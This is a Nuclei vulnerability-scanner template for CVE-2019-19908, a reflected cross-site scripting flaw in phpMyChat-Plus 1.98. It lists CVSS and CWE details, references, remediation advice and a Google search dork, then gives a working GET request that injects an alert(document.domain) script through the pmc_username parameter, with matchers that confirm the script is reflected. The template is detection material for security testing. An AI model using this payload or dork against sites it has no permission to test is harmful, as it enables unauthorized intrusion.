nuclei-templates/http/cves/2019/CVE-2019-19908.yaml

54 lines
1.7 KiB
YAML

id: CVE-2019-19908
info:
name: phpMyChat-Plus 1.98 - Cross-Site Scripting
author: madrobot
severity: medium
description: |
phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
remediation: |
Upgrade to a patched version of phpMyChat-Plus or apply the necessary security patches to mitigate the XSS vulnerability.
reference:
- https://cinzinga.github.io/CVE-2019-19908/
- http://ciprianmp.com/
- https://sourceforge.net/projects/phpmychat/
- https://nvd.nist.gov/vuln/detail/CVE-2019-19908
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-19908
cwe-id: CWE-79
epss-score: 0.00673
epss-percentile: 0.77633
cpe: cpe:2.3:a:ciprianmp:phpmychat-plus:1.98:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ciprianmp
product: phpmychat-plus
google-query: inurl:"/plus/pass_reset.php"
tags: cve,cve2019,phpMyChat,xss
http:
- method: GET
path:
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'username = "</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a0046304402202fedd61d8651e44bfe284df2114f5d0a9c32500dfd28ea388ee3d7d606a7ed4202203ba9fb3a97c9003332d43ca71dd31ef20a36d2548c14c9914578b4a61a33f61e:922c64590222798bb761d5b6d8e72950